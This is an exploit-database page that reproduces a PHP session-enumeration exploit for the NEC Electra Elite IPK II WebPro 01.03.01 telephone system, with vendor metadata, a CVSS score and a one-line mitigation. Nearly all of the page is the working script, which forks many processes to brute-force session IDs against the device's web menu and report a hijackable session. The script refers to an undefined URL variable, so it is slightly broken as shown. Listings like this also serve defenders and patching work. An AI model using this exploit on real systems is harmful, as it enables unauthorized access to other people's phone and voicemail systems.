header-logo
Suggest Exploit
vendor:
NEC Electra Elite IPK II WebPro
by:
Cold z3ro
4.3
CVSS
MEDIUM
Session Enumeration
200
CWE
Product Name: NEC Electra Elite IPK II WebPro
Affected Version From: 01.03.01
Affected Version To: 01.03.01
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

NEC Electra Elite IPK II WebPro 01.03.01 – Session Enumeration

NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration is a vulnerability that allows an attacker to enumerate valid session IDs and gain access to the system.

Mitigation:

Ensure that session IDs are generated using a cryptographically secure random number generator and that session IDs are not predictable.
Source

Exploit-DB raw data:

# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration 
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration 

<?php
set_time_limit(0);

$host = "192.168.0.14";

$start = 100;
$end = 30000;
$maxproc= 50;
$execute=0;

echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);
for ($i = $start; $i <= $end; $i++) 
{

	$pid = @pcntl_fork();
	$execute++;
	if ($execute >= $maxproc)
	{
		while (pcntl_waitpid(0, $status) != -1) 
		{
			$status = pcntl_wexitstatus($status);
			$execute =0;
			usleep(3000);
		}
	}
	if (!$pid) 
	{
		echo $url . " checking $i\n";
		login($url, $i);
		flush();
		exit; 
	}
}


function login($url, $key)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
	curl_setopt($ch, CURLOPT_TIMEOUT, 80);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
	curl_setopt($ch, CURLOPT_HEADER, FALSE);
	$content  = curl_exec($ch);
	curl_close ($ch);
	if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
	{
		die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
		
	}
}

Navigation

Suggest Exploit

Services By CQR